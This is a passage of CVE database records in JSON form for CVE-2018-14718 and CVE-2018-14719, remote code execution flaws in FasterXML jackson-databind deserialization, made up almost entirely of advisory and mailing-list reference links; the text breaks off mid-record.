"https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2021-03-25T00:06:19", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14718", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", refsource: "BID", url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14718", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.347Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14719
Vulnerability from cvelistv5
Published
2019-01-02 18:00
Modified
2024-08-05 09:38
Severity ?
EPSS score ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.192Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:29", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: 